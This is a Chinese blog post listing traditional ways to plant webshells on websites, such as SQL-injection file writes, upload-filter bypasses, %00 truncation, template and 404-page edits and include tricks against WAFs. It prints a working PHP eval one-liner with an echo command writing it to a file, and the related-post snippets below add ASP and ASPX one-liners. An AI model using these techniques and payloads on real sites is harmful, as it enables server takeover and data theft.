传统webshell上传方法小结

最新推荐文章于 2024-05-02 00:03:39 发布
最新推荐文章于 2024-05-02 00:03:39 发布
阅读量3w 收藏 67
点赞数 9
分类专栏: web安全 文章标签: 木马 web安全 webshell 网络安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Breeze_CAT/article/details/80044676
版权

文章目录


#传统webshell上传方法小结(不全)
这里整理了几种上传木马的方法,主要分为两类,拿到网站后台和没有网站后台权限两种。可能有一些比较老,已经很难见到了,每种只是简单介绍,用来提醒自己一下,以免忘记。具体的方法可以去网上针对每种方法搜索细致的教程和攻略,可能不是很全,以后会补充,暂时没什么例子,以后有了随时更新。
##普通权限下拿webshell
###使用sql注入拿webshell
前文提到了sql写入木马的方法,区别就是后台可以直接运行sql语句,而sql注入需要自己构造语句,但总体思路不变:

  1. 创建表
  2. 将一句话写入刚创建的表中
  3. 查询一句话所在表到文件,成功将一句话写入文件

###头像上传木马

  1. 将大马放在文件夹中
  2. 将文件夹压缩成压缩文件(zip)
  3. 正常上传一个头像并且抓包
  4. 将数据包中图片头像的内容部分删掉
  5. 重新写入文件内容,将压缩文件写入到原本图片的位置
  6. 上传
  7. 之后返回包中会告诉我们绝对路径

###文件上传漏洞
利用文件上传漏洞上传木马,绕过方式在这里就不细说了。
###远程命令执行
使用远程命令执行,执行命令行命令“写入内容到文件”如:echo“<?php @eval($_POST['caidao']);?>” > x.php 会自动将创建木马文件并将一句话木马写入其中,我们连接即可。
###xss和sql注入联合利用
有些输入框对一些符号过滤不严密(如<>,所以一般存在xss的地方就可以这么利用)我们可以在这里输入一句话<?php @eval($_POST['caidao']);?>之后再用数据库注入,查询到文件into file成功插入一句话木马
###网站写权限漏洞
有些网站的管理员在配置网站权限的时候疏忽,导致我们有写权限,这种漏洞需要用工具来利用,在这里就不说了,只是提一下。而且已经很少见了。
###通用漏洞
可以搜索一些跟网站相关的信息,比如cms类型和版本,编辑器类型,看看有没有通用的漏洞可以利用

##拿到后台管理权限下上传木马
###直接上传
当网站对上传的文件类型没有限制的时候直接利用后台的上传文件来上传木马脚本。大部分情况后台会告诉你上传位置,如果没有显示上传的绝对路径,可以抓包看response包。
###修改上传类型
当网站限制上传文件的类型但在后台却可以修改的时候,果断修改上传文件类型,允许上传脚本类型,之后上传我们的木马即可。
###数据库备份上传木马
当网站对上传的文件类型有限制的时候,我们可以先将木马上传成jpg等图片类型,之后使用数据库备份功能,将图片木马被分成脚本类型。
但并不是所有网站都这么蠢,有时候可能对于备份的目录,类型,是写死的,我们无法控制,可以通过修改静态页面,或者抓包改包等方式绕过。
###突破JavaScript限制上传类型
有些网站对于上传类型的限制卸载了js脚本中,我们可以:

  1. 直接删除本地js文件(不推荐,这样容易这个网页就没法用了)
  2. 用开发者工具(如firebug修改js)
  3. 上传jpg等图片类型,之后抓包改回脚本类型

###上传其他脚本类型
若目标服务器内还有其他类型的站点(如这个服务器内同时存在php的网站和asp的网站,我们获取了asp网站的后台,但这个后台限制我们上传asp的脚本文件)我们可以尝试上传不同类型的脚本文件,比如上传php,会发现服务器同样会执行。这是必然的,因为这个服务器中还有另一种类型的脚本的网站。
###%00截断
我们通过服务器的解析漏洞,上传文件时将文件名用以下格式命名:xx.asp%00.jpg,之后进行抓包,将%00编码成空字符(也是字符串结束符)之后forward数据包,可以进行绕过。
###服务器解析漏洞
利用已知的各版本服务器畸形解析漏洞来绕过:

  1. IIS 5.x/6.0
  2. IIS 7.0/7.5 Nginx<8.0
  3. Apach

###利用编辑器
利用网站的编辑器上传木马,可以上网搜索已知的编辑器漏洞,常用的有:fckeditor,ewebeditor,cheditor,有时候没有管理员权限也可以拿下webshell。
###网站配置
利用网站配置页面,这个页面的值会直接写入在脚本文件中,所以我们可以像xss一样来插入一句话木马,但需要注意的是,一定要闭合好之前的标签,插入之后也要开启之后的标签,否则容易使此页面报错,并且不可逆的损害。导致以后都无法利用这个页面。
###编辑模板
拿到后台之后,如果发现网站是使用的模板的话,我们可以编辑模板,将木马写在模板中。
###修改脚本文件
动态的网站,好多函数都是写在单独的文件中的,我们可以在写网站需要的函数的脚本文件中写入木马。
###数据库命令拿webshell
有些网站后台可以执行sql命令,这就和使用sql注入拿shell一样了:

  1. 创建表
  2. 将一句话写入刚创建的表中
  3. 查询一句话所在表到文件,成功将一句话写入文件

###编辑模板添加静态页面
现在网站的默认生成文件的目录中添加目录xx.asp(需要配合IIS6.0服务器的畸形解析漏洞),之后再此目录下的所有文件都会当做asp脚本执行,然后我们修改模板中的生成静态界面的函数使它生成携带木马代码的静态文件,但在此页面下会当做asp脚本执行,就会成功执行我们的木马脚本。
###文件包含
当我们的一句话木马上传成功,菜刀可以连接,但发现大马上传不了,被防火墙或者安全狗拦截时,可以考虑使用包含文件,思路如下;

  1. 先上传一个含有包含代码(如<!-- #include file="x.jpg" -->)却没有攻击代码的文件,不会被狗拦
  2. 再将大马改成jpg图片文件上传,也不会被狗拦
  3. 访问第一次上传的包含函数的文件,会发现执行了木马

这里是因为包含函数包含的文件会被当成脚本文件,直接将文件内容插入到这个文件中。
###添加插件
将木马放入zip压缩文件中,最好是网站插件的压缩文件,之后再后台安装插件,选中含有木马的压缩文件,会自动将插件连通木马安装在网站目录下,接下来我们只需要寻找到木马的绝对路径即可。
###修改404页面
在网站模板中的404页面中插入一句话木马,之后找到这个页面的绝对路径,访问之。

breezeO_o
关注
  • 9
    点赞
  • 67
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Webshell方式
悦分享
07-31 3781
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
数据库上WebShell的三种方式
m0_48520508的博客
08-08 3432
一、什么是WebShell? 简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上下载文件、查看数据库、执行任意程序命令等。 为了更好理解WebShell我们学习两个概念: 什么是“木马”? “木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市.
一句话木马拿shell教程
mad-coding Blog
03-21 1万+
0x00 前言 一句话木马: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 原理: php的...
2024年网络安全最新网络安全-webshell详解(原理、攻击、检测与防御)
最新发布
2401_84240129的博客
05-02 463
Webshell是通过服务器开放的端口获取服务器的某些权限。webshell又称脚本木马,一般分为大马、小马、一句话木马。大马,体积大、功能齐全、能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。小马,一般而言,我们在上文件的时候,会被限制上的文件大小或是拦截的情况,那么我通过小马来上大马,实现我们想要的功能。一句话木马,短小精悍、功能强大、隐蔽性好、使用客户端可以快速管理webshell
如何上WEBSHELL思路
12-26
如何上WEBSHELL思路 如何上WEBSHELL思路 如何上WEBSHELL思路
网络安全笔记-WebShell与文件上
L120305q的博客
08-17 2850
网络安全笔记-WebShell与文件上
nginx负载均衡下的webshell
m0_63069714的博客
02-14 540
因为我们是反向代理的负载均衡,就存在上文件出现一台后端服务器上有我们上的文件,另一台服务器上没有我们上的文件,出现的结果就是,一旦一台服务器上没有,那么在请求轮到这台服务器的时候,就会报出404的错误,从而影响使用,这也就是一会出现正常,一会出现错误的原因。当我们上一个较大的文件时,由于AntSword上文件时,采用的是分片上方式,把一个文件分成了多次HTTP请求发送给目标,造成文件的一部分内容在A这台服务器上,另一部分文件在B这台服务器上,从而使得较大的工具或者文件无法打开或者使用。
窃密型WebShell检测方法
01-30
前段时间由于项目的需要也因为正在负责一个后门检测小工具的项目开发所以恶补了一下Webshell检测技术内容,一路天马行空写下此文和大家分享。小弟才疏学浅如有内容上的问题还请不吝指正。近年来网站被植入后门等隐蔽...
MSSQL 2005 LOG备份webshell方法
12-15
注:转载就注入出自’孤孤浪子博客’原创 http://itpro.blog.163.com 第一步 http://itpro.blog.163.com/test.asp’;...declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/...
浅谈webshell检测方法
02-26
webshell中由于需要完成一些特殊的功能就不可避免的用到一些特殊的函数,我们也就可以对着特征值做检查来定位webshell,同样的webshell本身也会进行加密来躲避这种检测。下图就是一张phpwebshell的截图,它的功能...
突破VirtualWall上webshell
Coisini的博客
06-13 272
打开目标站点看了一下用的是易想商务网慧聪网风格V2.5 的商务建站系统! 随手看了一下,用NC提交注册一个用户名为woc.asp的用户名。系统会自动新建一个以用户名为命名的文件夹 然后来到相册管理,上一个改后缀为JPG的ASP大马。本来以为秒了 尼玛的,不给力 给拦截了,百思不其解,心想可能这马加密不够,蛋疼的拖来一个合并图片的一句话 可还是给拦截了,于是抓包看了一下上地址的URL htt...
开源Webshell利用工具Altman
07-24
开源Webshell利用工具——Altman: Altman基于.Net4.0开发,兼容Mono,理论上可以运行在windows、linux和mac等平台。(windows和ubuntu平台已经详细测试过,完美运行)是的,一直工作在kali下的同学有福了,只要简单的配置一下,Altman就可以运行在kaili上了( 需要安装Mono(>=3.2.8)以及libgdiplus)Altman整个程序采
教你如何拿下webshell
11-03
教你拿取webshell的45种方法,手动通过google hack技术及各种相应工具,让你找到上点等其他很多漏洞上木马拿到shell。
webshell技术
热门推荐
Jim的博客
08-16 1万+
中国菜刀连接一句话木马 1.上一句话木马,记录木马地址:http://192.168.1.3:8080/up/images/lubr.php  一句话木马:asp的一句话是:    php的一句话是: 2.菜刀连接 进入中国菜刀目录,点击chopper.exe 右键点击添加,在地址栏中添加上文件路径,右侧添加密码lubr, 脚本类型为PHP 右键点击文件管理,查看目标服务器的完整目
负载均衡反向代理下的webshell
weixin_59280309的博客
11-27 1068
负载均衡下的 WebShell 连接时会遇到的问题以及渗透
文件上Webshell连接方法
saber的博客
04-19 5742
Webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页木马后门,攻击者可以通过这种网页后门获得网站服务器操作权限,控制网站服务器以进行上下载文件, 查看数据库执行命令 通过服务器开放的端口获取服务器的某些权限。往目标网站中上一句话木马,然后你就可以在本地通过Shell管理工具连接即可获取和控制整个网站目录。
Tomcat后台管理漏洞复现(弱口令+上webshell)_tomcat文件上漏洞复现
04-15 897
web.xml 是这个应用的配置文件,而 classes 目录下则包含编译好的 servlet 类和 jsp,或者 servlet 所依赖的其他类(如 JavaBean)。1.3将抓到的包发送到爆破模块,快捷键ctrl+i,正常来说是用常见的弱口令字典去爆破,或者更强大的字典进行爆破,为了节省时间,这里就随便输入了几个账号密码。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然,如果是一个未知的后台登录,且可能存在弱口令,则使用Burp Suite进行抓包暴力破解,下面简单进行演示。
Web安全之文件上
qq_42751192的博客
06-13 2395
文件上漏洞是 Web 安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上漏洞顾名思义,就是攻击者上了一个可执行文件如木马,病毒,恶意脚本,WebShell 等到服务器执行,并最终获得网站控制权限的高危漏洞。大部分的网站和应用系统都有上功能,而程序员在开发任意文件上功能时,并未考虑文件格式后缀的合法性校验或者是否只在前端通过js进行后缀检验。
文件上绕过 web shell
2302_78011926的博客
08-02 224
:$DATA 表示文件的默认数据流,在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当 成文件流处理,上时将一个有害文件的文件名改为 evil.php::$DATA。非法用户可以上的恶意文件控制整个网站,甚至是控制服务器,这个恶意脚本文件,又被称为 webshell, 上 webshell 后门很方便地查看服务器信息,查看目录,执行系统命令等;文件上漏洞是指由于程序员再开发时,未对用户上的文件进行严格的验证和过滤,而导致用户可以 上可执行的动态脚本文件。
被上webshell的应急方法
07-28
遭遇到被上Webshell 的情况,需要迅速采取以下应急方法: 1. 立即隔离服务器:将受感染的服务器从网络中隔离,以防止恶意操作者进一步利用 Webshell 进行攻击或数据泄露。 2. 收集证据:记录下发现的 Webshell 文件的相关信息,包括创建时间、文件路径、文件内容等。这些信息可以帮助你进行后续的调查和分析。 3. 分析漏洞原因:审查服务器日志和相关配置文件,查找可能的漏洞入口,以确定是哪个漏洞导致了 Webshell 的上。这有助于修补系统漏洞,防止再次受到攻击。 4. 删除 Webshell 文件:彻底删除发现的所有 Webshell 文件,并确保清除与之相关的任何恶意代码。 5. 更新系统和应用程序:及时更新服务器操作系统和相关应用程序的补丁,以修复已知的漏洞。这可以提高系统的安全性,减少遭受攻击的风险。 6. 加强访问控制:审查服务器的访问控制策略,限制对敏感文件和目录的访问权限,同时加强对远程登录和文件上功能的控制。 7. 密码更改与加固:重置所有受影响用户的密码,并确保新密码强度足够高。此外,使用多因素身份验证等技术进一步加固系统的访问控制。 8. 安全审计与监控:配置安全审计日志记录,监测服务器的活动并及时发现异常行为。实时监控系统,以便快速应对任何潜在的安全事件。 9. 安全加固与培训:加强服务器的安全配置,关闭不必要的服务和端口,同时提供必要的安全培训,增强员工的安全意识和技能。 请注意,这些应急方法只是应对被上 Webshell 的初步措施,建议在处理过程中寻求专业人士的帮助,以确保系统安全性和数据完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值